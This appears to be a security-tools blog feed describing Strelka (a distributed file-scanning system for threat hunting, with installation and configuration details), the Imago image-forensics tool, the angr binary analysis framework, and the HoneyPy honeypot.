Strelka – Scanning Files At Scale With Python And ZeroMQ

Strelka is a real-time file scanning system used for threat hunting, threat detection, and incident response. Based on the design established by Lockheed Martin's Laika BOSS and similar projects (see: related projects), Strelka's purpose is to perform file extraction and metadata collection at huge scale.

Strelka differs from its sibling projects in a few significant ways:
- Codebase is Python 3 (minimum supported version is 3.6)
- Designed for non-interactive, distributed systems (network security monitoring sensors, live response scripts, disk/memory extraction, etc.)
- Supports direct and remote file requests (Amazon S3, Google Cloud Storage, etc.) with optional encryption and authentication
- Uses widely supported networking, messaging, and data libraries/formats (ZeroMQ, protocol buffers, YAML, JSON)
- Built-in scan result logging and log management (compatible with Filebeat/ElasticStack, Splunk, etc.)

Frequently Asked Questions

"Who is Strelka?"
Strelka was one of the second-generation Soviet space dogs to achieve orbital spaceflight — the name is an homage to Lockheed Martin's Laika BOSS, one of the first public projects of this type and the project on which Strelka's core design is based.

"Why would I want a file scanning system?"
File metadata is an additional pillar of data (alongside network, endpoint, authentication, and cloud) that is effective in enabling threat hunting, threat detection, and incident response, and it can help event analysts and incident responders bridge visibility gaps in their environment. This type of system is especially useful for identifying threat actors during KC3 and KC7. For examples of what Strelka can do, please read the use cases.

"Should I switch from my current file scanning system to Strelka?"
It depends — we recommend reviewing the features of each and choosing the most appropriate tool for your needs. We believe the most significant motivating factors for switching to Strelka are:
- Modern codebase (Python 3.6+)
- More scanners (40+ at release) and file types (60+ at release) than related projects
- Supports direct and remote file requests
- Built-in encryption and authentication for client connections
- Built using libraries and formats that allow cross-platform, cross-language support

"Are Strelka's scanners compatible with Laika BOSS, File Scanning Framework, or Assemblyline?"
Due to differences in design, Strelka's scanners are not directly compatible with Laika BOSS, File Scanning Framework, or Assemblyline. With some effort, most scanners can likely be ported to the other projects.

"Is Strelka an intrusion detection system (IDS)?"
Strelka shouldn't be thought of as an IDS, but it can be used for threat detection through YARA rule matching and downstream metadata interpretation. Strelka's design follows the philosophy established by other popular metadata collection systems (Bro, Sysmon, Volatility, etc.): it extracts data and leaves the decision-making up to the user.

"Does it work at scale?"
Everyone has their own definition of "at scale," but we have been using Strelka and systems like it to scan up to 100 million files each day for over a year and have never reached a point where the system could not scale to our needs — as file volume and diversity increases, horizontally scaling the system should allow you to scan any number of files.

"Doesn't this use a lot of bandwidth?"
Yep! Strelka isn't designed to operate in limited-bandwidth environments, but we have experimented with solutions to this and there are tricks you can use to reduce bandwidth. These are what we've found most successful:
- Reduce the total volume of files sent to Strelka
- Use a tracking system to only send unique files to Strelka (networked Redis servers are especially useful for this; see the sketch below)
- Use traffic control (tc) to shape connections to Strelka
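To make the Redis-based tracking idea concrete, here is a minimal sketch (not part of Strelka itself): it hashes each candidate file and uses a Redis key with NX semantics as a "seen" marker, so only first-seen files get forwarded to the cluster. The send_to_strelka callback and the 24-hour expiry are hypothetical placeholders.

import hashlib

import redis  # pip install redis


def submit_if_new(path, send_to_strelka, redis_client):
    """Forward a file to Strelka only if its SHA-256 has not been seen recently."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1024 * 1024), b""):
            digest.update(chunk)
    key = "strelka:seen:" + digest.hexdigest()
    # SET with nx=True succeeds only for the first writer; expire the marker after 24h.
    if redis_client.set(key, 1, nx=True, ex=86400):
        send_to_strelka(path)  # hypothetical callback that performs the actual file request
        return True
    return False


# Usage sketch:
# client = redis.Redis(host="10.0.0.5", port=6379)
# submit_if_new("/tmp/sample.exe", my_send_function, client)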
"Should I run my Strelka cluster on my Bro/Suricata network sensor?"
No! Strelka clusters run CPU-intensive processes that will negatively impact system-critical applications like Bro and Suricata. If you want to integrate a network sensor with Strelka, then use strelka_dirstream.py. This utility is capable of sending millions of files per day from a single network sensor to a Strelka cluster without impacting system-critical applications.

"I have other questions!"
Please file an issue or contact the project team at TTS-CFC-OpenSource@target.com. The project lead can also be reached on Twitter at @jshlbrd.

Installation
The recommended operating system for Strelka is Ubuntu 18.04 LTS (Bionic Beaver) — it may work with earlier versions of Ubuntu if the appropriate packages are installed. We recommend using the Docker container for production deployments and welcome pull requests that add instructions for installing on other operating systems.

Ubuntu 18.04 LTS

Update packages and install build packages:
apt-get update && apt-get install --no-install-recommends automake build-essential curl gcc git libtool make python3-dev python3-pip python3-wheel

Install runtime packages:
apt-get install --no-install-recommends antiword libarchive-dev libfuzzy-dev libimage-exiftool-perl libmagic-dev libssl-dev python3-setuptools tesseract-ocr unrar upx jq

Install pip3 packages:
pip3 install beautifulsoup4 boltons boto3 gevent google-cloud-storage html5lib inflection interruptingcow jsbeautifier libarchive-c lxml git+https://github.com/aaronst/macholibre.git olefile oletools pdfminer.six pefile pgpdump3 protobuf pyelftools pygments pyjsparser pylzma git+https://github.com/jshlbrd/pyopenssl.git python-docx git+https://github.com/jshlbrd/python-entropy.git python-keystoneclient python-magic python-swiftclient pyyaml pyzmq rarfile requests rpmfile schedule ssdeep tnefparse

Install YARA:
curl -OL https://github.com/VirusTotal/yara/archive/v3.8.1.tar.gz
tar -zxvf v3.8.1.tar.gz
cd yara-3.8.1/
./bootstrap.sh
./configure --with-crypto --enable-dotnet --enable-magic
make && make install && make check
echo "/usr/local/lib" >> /etc/ld.so.conf
ldconfig

Install yara-python:
curl -OL https://github.com/VirusTotal/yara-python/archive/v3.8.1.tar.gz
tar -zxvf v3.8.1.tar.gz
cd yara-python-3.8.1/
python3 setup.py build --dynamic-linking
python3 setup.py install

Create Strelka directories:
mkdir /var/log/strelka/ && mkdir /opt/strelka/

Clone this repository:
git clone https://github.com/target/strelka.git /opt/strelka/

Compile the Strelka protobuf:
cd /opt/strelka/server/ && protoc --python_out=. strelka.proto

(Optional) Install the Strelka utilities:
cd /opt/strelka/ && python3 setup.py -q build && python3 setup.py -q install && python3 setup.py -q clean --all

Docker

Clone this repository:
git clone https://github.com/target/strelka.git /opt/strelka/

Build the container:
cd /opt/strelka/ && docker build -t strelka .

Quickstart
By default, Strelka is configured to use a minimal "quickstart" deployment that allows users to test the system. This configuration is not recommended for production deployments. Using two Terminal windows, do the following:

Terminal 1:
$ strelka.py

Terminal 2:
$ strelka_user_client.py --broker 127.0.0.1:5558 --path <path-to-file>
$ cat /var/log/strelka/*.log | jq .

Terminal 1 runs a Strelka cluster (broker, 4 workers, and log rotation) with debug logging, and Terminal 2 is used to send file requests to the cluster and read the scan results.

Deployment

Utilities
Strelka's design as a distributed system creates the need for client-side and server-side utilities. Client-side utilities provide methods for sending file requests to a cluster and server-side utilities provide methods for distributing and scanning files sent to a cluster.

strelka.py
strelka.py is a non-interactive, server-side utility that contains everything needed for running a large-scale, distributed Strelka cluster. This includes:
- Capability to run servers in any combination of broker/workers
  - Broker distributes file tasks to workers
  - Workers perform file analysis on tasks
- On-disk scan result logging
  - Configurable log rotation and management
  - Compatible with external log shippers (e.g. Filebeat, Splunk Universal Forwarder, etc.)
- Supports encryption and authentication for connections between clients and brokers
- Self-healing child processes (brokers, workers, log management)

This utility is managed with two configuration files: etc/strelka/strelka.yml and etc/strelka/pylogging.ini.

The help page for strelka.py is shown below:

usage: strelka.py [options]

runs Strelka as a distributed cluster.

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           enable debug messages to the console
  -c STRELKA_CFG, --strelka-config STRELKA_CFG
                        path to strelka configuration file
  -l LOGGING_INI, --logging-ini LOGGING_INI
                        path to python logging configuration file

strelka_dirstream.py
strelka_dirstream.py is a non-interactive, client-side utility used for sending files from a directory to a Strelka cluster in near real-time. This utility uses inotify to watch the directory and sends files to the cluster as soon as possible after they are written.
Additionally, for select file sources, this utility can parse metadata embedded in the file's filename and send it to the cluster as external metadata. Bro network sensors are currently the only supported file source, but other application-specific sources can be added.
Using the utility with Bro requires no modification of the Bro source code, but it does require the network sensor to run a Bro script that enables file extraction. We recommend using our stub Bro script (etc/bro/extract-strelka.bro) to extract files. Other extraction scripts will also work, but they will not parse Bro's metadata.
This utility is managed with one configuration file: etc/dirstream/dirstream.yml.

The help page for strelka_dirstream.py is shown below:

usage: strelka_dirstream.py [options]

sends files from a directory to a Strelka cluster in near real-time.

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           enable debug messages to the console
  -c DIRSTREAM_CFG, --dirstream-config DIRSTREAM_CFG
                        path to dirstream configuration file

strelka_user_client.py
strelka_user_client.py is a user-driven, client-side utility that is used for sending ad-hoc file requests to a cluster. This client should be used when file analysis is needed for a specific file or group of files — it is explicitly designed for users and should not be expected to perform long-lived or fully automated file requests.
We recommend using this utility as an example of what is required in building new client utilities.
Using this utility, users can send three types of file requests:
- Individual file
- Directory of files
- Remote file (see: remote file requests)

The help page for strelka_user_client.py is shown below:

usage: strelka_user_client.py [options]

sends ad-hoc file requests to a Strelka cluster.

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           enable debug messages to the console
  -b BROKER, --broker BROKER
                        network address and network port of the broker (e.g. 127.0.0.1:5558)
  -p PATH, --path PATH  path to the file or directory of files to send to the broker
  -l LOCATION, --location LOCATION
                        JSON representation of a location for the cluster to retrieve files from
  -t TIMEOUT, --timeout TIMEOUT
                        amount of time (in seconds) to wait until a file transfer times out
  -bpk BROKER_PUBLIC_KEY, --broker-public-key BROKER_PUBLIC_KEY
                        location of the broker Curve public key certificate (this option enables
                        curve encryption and must be used if the broker has curve enabled)
  -csk CLIENT_SECRET_KEY, --client-secret-key CLIENT_SECRET_KEY
                        location of the client Curve secret key certificate (this option enables
                        curve encryption and must be used if the broker has curve enabled)
  -ug, --use-green      determines if PyZMQ green should be used, which can increase performance
                        at the risk of message loss

generate_curve_certificates.py
generate_curve_certificates.py is a utility used for generating broker and worker Curve certificates. This utility is required for setting up Curve encryption/authentication.

The help page for generate_curve_certificates.py is shown below:

usage: generate_curve_certificates.py [options]

generates curve certificates used by brokers and clients.

optional arguments:
  -h, --help            show this help message and exit
  -p PATH, --path PATH  path to store keys in (defaults to current working directory)
  -b, --broker          generate curve certificates for a broker
  -c, --client          generate curve certificates for a client
  -cf CLIENT_FILE, --client-file CLIENT_FILE
                        path to a file containing line-separated list of clients to generate keys
                        for, useful for creating many client keys at once

validate_yara.py
validate_yara.py is a utility used for recursively validating a directory of YARA rules files. This can be useful when debugging issues related to the ScanYara scanner.

The help page for validate_yara.py is shown below:

usage: validate_yara.py [options]

validates YARA rules files.

optional arguments:
  -h, --help            show this help message and exit
  -p PATH, --path PATH  path to directory containing YARA rules
  -e, --error           boolean that determines if warnings should cause errors

Configuration Files
Strelka uses YAML for configuring client-side and server-side utilities. We recommend using the default configurations and modifying the options as needed.

Strelka Configuration (strelka.py)
Strelka's cluster configuration file is stored in etc/strelka/strelka.yml and contains three sections: daemon, remote, and scan.

Daemon Configuration
The daemon configuration contains five sub-sections: processes, network, broker, workers, and logrotate.

The "processes" section controls the processes launched by the daemon. The configuration options are:
- "run_broker": boolean that determines if the server should run a Strelka broker process (defaults to True)
- "run_workers": boolean that determines if the server should run Strelka worker processes (defaults to True)
- "run_logrotate": boolean that determines if the server should run a Strelka log rotation process (defaults to True)
- "worker_count": number of workers to spawn (defaults to 4)
- "shutdown_timeout": amount of time (in seconds) that will elapse before the daemon forcibly kills child processes after they have received a shutdown command (defaults to 45 seconds)

The "network" section controls network connectivity. The configuration options are:
- "broker": network address of the broker (defaults to 127.0.0.1)
- "request_socket_port": network port used by clients to send file requests to the broker (defaults to 5558)
- "task_socket_port": network port used by workers to receive tasks from the broker (defaults to 5559)

The "broker" section controls settings related to the broker process. The configuration options are:
- "poller_timeout": amount of time (in milliseconds) that the broker polls for client requests and worker statuses (defaults to 1000 milliseconds)
- "broker_secret_key": location of the broker Curve secret key certificate (enables Curve encryption, requires clients to use Curve, defaults to None)
- "client_public_keys": location of the directory containing client Curve public key certificates (enables Curve encryption and authentication, requires clients to use Curve, defaults to None)
- "prune_frequency": frequency (in seconds) at which the broker prunes dead workers (defaults to 5 seconds)
- "prune_delta": delta (in seconds) that must pass since a worker last checked in with the broker before it is considered dead and is pruned (defaults to 10 seconds)

The "workers" section controls settings related to worker processes. The configuration options are:
- "task_socket_reconnect": amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 100ms plus jitter)
- "task_socket_reconnect_max": maximum amount of time (in milliseconds) that the task socket will attempt to reconnect in the event of TCP disconnection, this will have additional jitter applied (defaults to 4000ms plus jitter)
- "poller_timeout": amount of time (in milliseconds) that workers poll for file tasks (defaults to 1000 milliseconds)
- "file_max": number of files a worker will process before shutting down (defaults to 10000)
- "time_to_live": amount of time (in minutes) that a worker will run before shutting down (defaults to 30 minutes)
- "heartbeat_frequency": frequency (in seconds) at which a worker sends a heartbeat to the broker if it has not received any file tasks (defaults to 10 seconds)
- "log_directory": location where worker scan results are logged to (defaults to /var/log/strelka/)
- "log_field_case": field case ("camel" or "snake") of the scan result log file data (defaults to camel)
- "log_bundle_events": boolean that determines if scan results should be bundled in a single event as an array or in multiple events (defaults to True)

The "logrotate" section controls settings related to the log rotation process. The configuration options are:
- "directory": directory to run log rotation on (defaults to /var/log/strelka/)
- "compression_delta": delta (in minutes) that must pass since a log file was last modified before it is compressed (defaults to 15 minutes)
- "deletion_delta": delta (in minutes) that must pass since a compressed log file was last modified before it is deleted (defaults to 360 minutes / 6 hours)

Remote Configuration
The remote configuration contains one sub-section: remote.

The "remote" section controls how workers retrieve files from remote file stores. Google Cloud Storage, Amazon S3, OpenStack Swift, and HTTP file stores are supported. All options in this configuration file are optionally read from environment variables if they are "null". The configuration options are:
- "remote_timeout": amount of time (in seconds) to wait before timing out individual file retrieval
- "remote_retries": number of times individual file retrieval will be re-attempted in the event of a timeout
- "google_application_credentials": path to the Google Cloud Storage JSON credentials file
- "aws_access_key_id": AWS access key ID
- "aws_secret_access_key": AWS secret access key
- "aws_default_region": default AWS region
- "st_auth_version": OpenStack authentication version (defaults to 3)
- "os_auth_url": OpenStack Keystone authentication URL
- "os_username": OpenStack username
- "os_password": OpenStack password
- "os_cert": OpenStack Keystone certificate
- "os_cacert": OpenStack Keystone CA Certificate
- "os_user_domain_name": OpenStack user domain
- "os_project_name": OpenStack project name
- "os_project_domain_name": OpenStack project domain
- "http_basic_user": HTTP Basic authentication username
- "http_basic_pass": HTTP Basic authentication password
- "http_verify": path to the CA bundle (file or directory) used for SSL verification (defaults to False, no verification)

Scan Configuration
The scan configuration contains two sub-sections: distribution and scanners.

The "distribution" section controls how files are distributed through the system. The configuration options are:
- "close_timeout": amount of time (in seconds) that a scanner can spend closing itself (defaults to 30 seconds)
- "distribution_timeout": amount of time (in seconds) that a single file can be distributed to all scanners (defaults to 1800 seconds / 30 minutes)
- "scanner_timeout": amount of time (in seconds) that a scanner can spend scanning a file (defaults to 600 seconds / 10 minutes, can be overridden per-scanner)
- "maximum_depth": maximum depth that child files will be processed by scanners
- "taste_mime_db": location of the MIME database used to taste files (defaults to None, system default)
- "taste_yara_rules": location of the directory of YARA files that contains rules used to taste files (defaults to etc/strelka/taste/)

The "scanners" section controls which scanners are assigned to each file; each scanner is assigned by mapping flavors, filenames, and sources from this configuration to the file. "scanners" must always be a dictionary where the key is the scanner name (e.g. ScanZip) and the value is a list of dictionaries containing values for mappings, scanner priority, and scanner options.
Assignment occurs through a system of positive and negative matches: any negative match causes the scanner to skip assignment and at least one positive match causes the scanner to be assigned. A unique identifier (*) is used to assign scanners to all flavors. See File Distribution, Scanners, Flavors, and Tasting for more details on flavors.

Below is a sample configuration that runs the scanner "ScanHeader" on all files and the scanner "ScanRar" on files that match a YARA rule named "rar_file".

scanners:
  'ScanHeader':
    - positive:
        flavors:
          - '*'
      priority: 5
      options:
        length: 50
  'ScanRar':
    - positive:
        flavors:
          - 'rar_file'
      priority: 5
      options:
        limit: 1000

The "positive" dictionary determines which flavors, filenames, and sources cause the scanner to be assigned. Flavors is a list of literal strings while filenames and sources are regular expressions. One positive match will assign the scanner to the file.

Below is a sample configuration that shows how RAR files can be matched against a YARA rule (rar_file), a MIME type (application/x-rar), and a filename (any that end with .rar).

scanners:
  'ScanRar':
    - positive:
        flavors:
          - 'application/x-rar'
          - 'rar_file'
        filename: '\.rar$'
      priority: 5
      options:
        limit: 1000

Each scanner also supports negative matching through the "negative" dictionary. Negative matches occur before positive matches, so any negative match guarantees that the scanner will not be assigned. Similar to positive matches, negative matches support flavors, filenames, and sources.

Below is a sample configuration that shows how RAR files can be positively matched against a YARA rule (rar_file) and a MIME type (application/x-rar), but only if they are not negatively matched against a filename (\.rar$). This configuration would cause ScanRar to only be assigned to RAR files that do not have the extension ".rar".

scanners:
  'ScanRar':
    - negative:
        filename: '\.rar$'
      positive:
        flavors:
          - 'application/x-rar'
          - 'rar_file'
      priority: 5
      options:
        limit: 1000

Each scanner supports multiple mappings — this makes it possible to assign different priorities and options to the scanner based on the mapping variables. If a scanner has multiple mappings that match a file, then the first mapping wins.

Below is a sample configuration that shows how a single scanner can apply different options depending on the mapping.

scanners:
  'ScanX509':
    - positive:
        flavors:
          - 'x509_der_file'
      priority: 5
      options:
        type: 'der'
    - positive:
        flavors:
          - 'x509_pem_file'
      priority: 5
      options:
        type: 'pem'

Python Logging Configuration (strelka.py)
strelka.py uses an ini file (etc/strelka/pylogging.ini) to manage cluster-level statistics and information output by the Python logger. By default, this configuration file will log data to stdout and disable logging for packages imported by scanners.

DirStream Configuration (strelka_dirstream.py)
Strelka's dirstream configuration file is stored in etc/dirstream/dirstream.yml and contains two sub-sections: processes and workers.

The "processes" section controls the processes launched by the utility. The configuration options are:
- "shutdown_timeout": amount of time (in seconds) that will elapse before the utility forcibly kills child processes after they have received a shutdown command (defaults to 10 seconds)

The "workers" section controls directory settings and network settings for each worker that sends files to the Strelka cluster. This section is a list; adding multiple directory/network settings makes it so multiple directories can be monitored at once.
The configuration options are:
- "directory": directory that files are sent from (defaults to None)
- "source": application that writes files to the directory, used to control metadata parsing functionality (defaults to None)
- "meta_separator": unique string used to separate pieces of metadata in a filename, used to parse metadata and send it along with the file to the cluster (defaults to "S^E^P")
- "file_mtime_delta": delta (in seconds) that must pass since a file was last modified before it is sent to the cluster (defaults to 5 seconds)
- "delete_files": boolean that determines if files should be deleted after they are sent to the cluster (defaults to False)
- "broker": network address and network port of the broker (defaults to "127.0.0.1:5558")
- "timeout": amount of time (in seconds) to wait for a file to be successfully sent to the broker (defaults to 10)
- "use_green": boolean that determines if PyZMQ green should be used (this can increase performance at the risk of message loss, defaults to True)
- "broker_public_key": location of the broker Curve public key certificate (enables Curve encryption, must be used if the broker has Curve enabled)
- "client_secret_key": location of the client Curve secret key certificate (enables Curve encryption, must be used if the broker has Curve enabled)

To enable Bro support, a Bro file extraction script must be run by the Bro application; Strelka's file extraction script is stored in etc/bro/extract-strelka.bro and includes variables that can be redefined at Bro runtime. These variables are:
- "mime_table": table of strings (Bro source) mapped to a set of strings (Bro mime_type) — this variable defines which file MIME types Bro extracts and is configurable based on the location Bro identified the file (e.g. extract application/x-dosexec files from SMTP, but not SMB or FTP)
- "filename_re": regex pattern that can extract files based on Bro filename
- "unknown_mime_source": set of strings (Bro source) that determines if files of an unknown MIME type should be extracted based on the location Bro identified the file (e.g. extract unknown files from SMTP, but not SMB or FTP)
- "meta_separator": string used in extracted filenames to separate embedded Bro metadata — this must match the equivalent value in etc/dirstream/dirstream.yml (see the parsing sketch after this list)
- "directory_count_interval": interval used to schedule how often the script checks the file count in the extraction directory
- "directory_count_threshold": int that is used as a trigger to temporarily disable file extraction if the file count in the extraction directory reaches the threshold
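To illustrate how the meta_separator ties Bro and dirstream together, here is a minimal, hypothetical parsing sketch. The field layout in the example filename is made up for illustration; the real layout is defined by extract-strelka.bro and parsed by strelka_dirstream.py.

# Hypothetical example: split an extracted filename on the default "S^E^P"
# separator to recover metadata that Bro embedded when writing the file.
SEPARATOR = "S^E^P"

def parse_extracted_filename(filename):
    parts = filename.split(SEPARATOR)
    # Illustrative field names only; not the actual Strelka/Bro layout.
    keys = ["fuid", "source", "mime_type", "original_filename"]
    return dict(zip(keys, parts))

print(parse_extracted_filename(
    "FdZx1h2XkqUmE2nvi9S^E^PSMTPS^E^Papplication/x-dosexecS^E^Pinvoice.exe"))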
Encryption and Authentication
Strelka has built-in, optional encryption and authentication for client connections provided by CurveZMQ.

CurveZMQ
CurveZMQ (Curve) is ZMQ's encryption and authentication protocol. Read more about it here.

Using Curve
Strelka uses Curve to encrypt and authenticate connections between clients and brokers. By default, Strelka's Curve support is set up to enable encryption but not authentication.
To enable Curve encryption, the broker must be loaded with a private key — any clients connecting to the broker must have the broker's public key to successfully connect.
To enable Curve encryption and authentication, the broker must be loaded with a private key and a directory of client public keys — any clients connecting to the broker must have the broker's public key and have their client key loaded on the broker to successfully connect.
The generate_curve_certificates.py utility can be used to create client and broker certificates (a certificate-generation sketch appears at the end of this post).

Clusters
The following are recommendations and considerations to keep in mind when deploying clusters.

General Recommendations
The following recommendations apply to all clusters:
- Do not run workers on the same server as a broker
  - This puts the health of the entire cluster at risk if the server becomes over-utilized
- Do not over-allocate workers to CPUs
  - 1 worker per CPU
- Allocate at least 1GB RAM per worker
  - If workers do not have enough RAM, then there will be excessive memory errors
  - Big files (especially compressed files) require more RAM
  - In large clusters, diminishing returns begin above 4GB RAM per worker
- Allocate as much RAM as reasonable to the broker
  - ZMQ messages are stored entirely in memory — in large deployments with many clients, the broker may use a lot of RAM if the workers cannot keep up with the number of file tasks

Sizing Considerations
Multiple variables should be considered when determining the appropriate size for a cluster:
- Number of file requests per second
- Type of file requests
  - Remote file requests take longer to process than direct file requests
- Diversity of files requested
  - Binary files take longer to scan than text files
- Number of YARA rules deployed
  - Scanning a file with 50,000 rules takes longer than scanning a file with 50 rules
The best way to properly size a cluster is to start small, measure performance, and scale out as needed.

Docker Considerations
Below is a list of considerations to keep in mind when running a cluster with Docker containers:
- Share volumes, not files, with the container
  - Strelka's workers will read configuration files and YARA rules files when they start up — sharing volumes with the container ensures that updated copies of these files on the localhost are reflected accurately inside the container without needing to restart the container
- Increase stop-timeout
  - By default, Docker will forcibly kill a container if it has not stopped after 10 seconds — this value should be increased to greater than the shutdown_timeout value in etc/strelka/strelka.yml
- Increase shm-size
  - By default, Docker limits a container's shm size to 64MB — this can cause errors with Strelka scanners that utilize tempfile
- Set logging options
  - By default, Docker has no log limit for logs output by a container

Management
Due to its distributed design, we recommend using container orchestration (e.g. Kubernetes) or configuration management/provisioning (e.g. Ansible, SaltStack, etc.) systems for managing clusters.
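As a reference for the Curve setup described under Encryption and Authentication, CurveZMQ certificates can also be generated directly with pyzmq's zmq.auth helper. This is a generic pyzmq sketch, not the code of generate_curve_certificates.py, though the utility presumably wraps the same primitive:

import os

import zmq.auth  # ships with pyzmq

# Generate CurveZMQ keypairs for a broker and one client. Each call writes a
# <name>.key (public) and <name>.key_secret (secret) certificate file.
keys_dir = os.path.abspath("curve_keys")
os.makedirs(keys_dir, exist_ok=True)

broker_public, broker_secret = zmq.auth.create_certificates(keys_dir, "broker")
client_public, client_secret = zmq.auth.create_certificates(keys_dir, "client")

print("broker certs:", broker_public, broker_secret)
print("client certs:", client_public, client_secret)
# The broker would load its secret certificate ("broker_secret_key" in strelka.yml)
# and, for authentication, a directory of client *.key files ("client_public_keys");
# clients load the broker public certificate.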

Download Strelka

Link: http://feedproxy.google.com/~r/PentestTools/~3/J5e-Il60yXg/strelka-scanning-files-at-scale-with.html

Imago Forensics – Imago Is A Python Tool That Extracts Digital Evidence From Images

Imago is a Python tool that recursively extracts digital evidence from images. This tool is useful throughout a digital forensic investigation: if you need to extract digital evidence from a large number of images, Imago lets you compare them easily. Imago can export the evidence to a CSV file or to a SQLite database. If GPS coordinates are present in a JPEG's EXIF data, Imago can extract the longitude and latitude, convert them to degrees, and retrieve relevant information such as city, nation, and zip code. Imago also offers the ability to calculate Error Level Analysis and to detect nudity; these functionalities are in BETA.

Setup

Setup via pip
Install imago:
$ pip install imago
Once installed, a new binary should be available:
$ imago
It should then output Imago's banner.

Requirements:
- python 2.7
- exifread 2.1.2
- python-magic 0.4.15
- argparse 1.4.0
- pillow 5.2.0
- nudepy 0.4
- imagehash 4.0
- geopy 1.16.0

Usage

usage: imago.py [-h] -i INPUT [-x] [-g] [-e] [-n] [-d {md5,sha256,sha512,all}]
                [-p {ahash,phash,dhash,whash,all}] [-o OUTPUT] [-s]
                [-t {jpeg,tiff}]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input directory path
  -x, --exif            Extract exif metadata
  -g, --gps             Extract, parse and convert to coordinates GPS exif metadata from
                        images (if any). It works only with JPEG.
  -e, --ela             Extract Error Level Analysis image. It works only with JPEG. *BETA*
  -n, --nude            Detect nudity. It works only with JPEG. *BETA*
  -d {md5,sha256,sha512,all}, --digest {md5,sha256,sha512,all}
                        Calculate hash digest
  -p {ahash,phash,dhash,whash,all}, --percentualhash {ahash,phash,dhash,whash,all}
                        Calculate perceptual image hashing
  -o OUTPUT, --output OUTPUT
                        Output directory path
  -s, --sqli            Keep SQLite file after the computation
  -t {jpeg,tiff}, --type {jpeg,tiff}
                        Select the image type; this flag can be JPEG or TIFF. If this
                        argument is not provided, imago will process all image types
                        (i.e. JPEG, TIFF)

The only required argument is -i, which is the base directory from which imago will start searching for image files. You should also provide at least one type of extraction (i.e. exif, data, gps, digest).

Example:
$ imago -i /home/solvent/cases/c23/DCIM/ -o /home/solvent/cases/c23/ -x -s -t jpeg -d all

Where:
- -i path: the base directory where imago will search for files
- -o path: the output directory where imago will save the CSV file with the extracted metadata
- -x: imago will extract EXIF metadata
- -s: the temporary SQLite database will not be deleted after processing
- -t jpeg: imago will search only for JPEG images
- -d all: imago will calculate md5, sha256, and sha512 for the JPEG images

Features:
- Recursive directory navigation: ✔
- file mtime (UTC): ✔
- file ctime (UTC): ✔
- file atime (UTC): ✔
- file size (bytes): ✔
- MIME type: ✔
- Exif support: ✔
- CSV export: ✔
- Sqlite export: ✔
- md5, sha256, sha512: ✔
- Error Level Analysis: ✔ BETA
- Full GPS support: ✔
- Nudity detection: ✔ BETA
- Perceptual Image Hashing: ✔ (aHash ✔, pHash ✔, dHash ✔, wHash ✔)
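As background for the -g option, this is the kind of conversion Imago performs: reading the GPS EXIF tags and turning the degree/minute/second ratios into decimal degrees. The snippet below is an independent sketch using the exifread dependency, not Imago's own code:

import exifread  # already an Imago dependency


def _to_degrees(ratios):
    # ratios is [degrees, minutes, seconds]; each is an exifread Ratio (num/den).
    d, m, s = [float(r.num) / float(r.den) for r in ratios]
    return d + m / 60.0 + s / 3600.0


def gps_from_jpeg(path):
    with open(path, "rb") as fh:
        tags = exifread.process_file(fh, details=False)
    try:
        lat = _to_degrees(tags["GPS GPSLatitude"].values)
        lon = _to_degrees(tags["GPS GPSLongitude"].values)
    except KeyError:
        return None  # no GPS metadata present
    if str(tags.get("GPS GPSLatitudeRef")) == "S":
        lat = -lat
    if str(tags.get("GPS GPSLongitudeRef")) == "W":
        lon = -lon
    return lat, lon


# print(gps_from_jpeg("DCIM/IMG_0001.jpg"))  # (latitude, longitude) in decimal degrees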

Download Imago-Forensics

Link: http://feedproxy.google.com/~r/PentestTools/~3/JzmwiCsLTtY/imago-forensics-imago-is-python-tool.html

Angr – A Powerful And User-Friendly Binary Analysis Platform

angr is a platform-agnostic binary analysis framework. It is brought to you by the Computer Security Lab at UC Santa Barbara, SEFCOM at Arizona State University, their associated CTF team Shellphish, the open source community, and @rhelmot.

What?
angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:
- Disassembly and intermediate-representation lifting
- Program instrumentation
- Symbolic execution
- Control-flow analysis
- Data-dependency analysis
- Value-set analysis (VSA)
- Decompilation

The most common angr operation is loading a binary: p = angr.Project('/bin/bash'). If you do this in an enhanced REPL like IPython, you can use tab-autocomplete to browse the top-level-accessible methods and their docstrings.

The short version of "how to install angr" is:
mkvirtualenv --python=$(which python3) angr && python -m pip install angr

Example
angr does a lot of binary analysis stuff. To get you started, here's a simple example of using symbolic execution to get a flag in a CTF challenge.

import angr

project = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)

@project.hook(0x400844)
def print_flag(state):
    print("FLAG SHOULD BE:", state.posix.dumps(0))
    project.terminate_execution()

project.execute()

Quick Start
- Install Instructions
- Documentation as HTML and as a Github repository
- Dive right in: top-level-accessible methods
- Examples using angr to solve CTF challenges
- API Reference
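The example above drives execution with a hook; the other pattern you will see throughout angr's documentation is letting a simulation manager explore toward an address. Here is a minimal sketch of that approach — the find/avoid addresses are placeholders for whatever the challenge requires:

import angr

# Hypothetical addresses: FIND_ADDR is the "success" basic block, AVOID_ADDR a failure path.
FIND_ADDR = 0x400844
AVOID_ADDR = 0x400855

project = angr.Project("angr-doc/examples/defcamp_r100/r100", auto_load_libs=False)
state = project.factory.entry_state()
simgr = project.factory.simulation_manager(state)

# Symbolically execute until a state reaches FIND_ADDR, pruning paths that hit AVOID_ADDR.
simgr.explore(find=FIND_ADDR, avoid=AVOID_ADDR)

if simgr.found:
    solution_state = simgr.found[0]
    print("stdin that reaches the target:", solution_state.posix.dumps(0))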

Download Angr

Link: http://feedproxy.google.com/~r/PentestTools/~3/d91K9L2OVN8/angr-powerful-and-user-friendly-binary.html

HoneyPy – A Low To Medium Interaction Honeypot

A low-interaction honeypot with the capability to be more of a medium-interaction honeypot.

HoneyPy is written in Python 2 and is intended to be easy to:
- install and deploy
- extend with plugins and loggers
- run with custom configurations

Feel free to follow the QuickStart Guide to dive in directly. The main documentation can be found at the HoneyPy Docs site.

Live HoneyPy data gets posted to:
- Twitter: https://twitter.com/HoneyPyLog
- A web service endpoint, and displayed via the HoneyDB web site: https://riskdiscovery.com/honeydb

Leave an issue or feature request! Use the GitHub issue tracker to tell us what's on your mind.
Pull requests are welcome! If you would like to create new plugins or improve existing ones, please do.

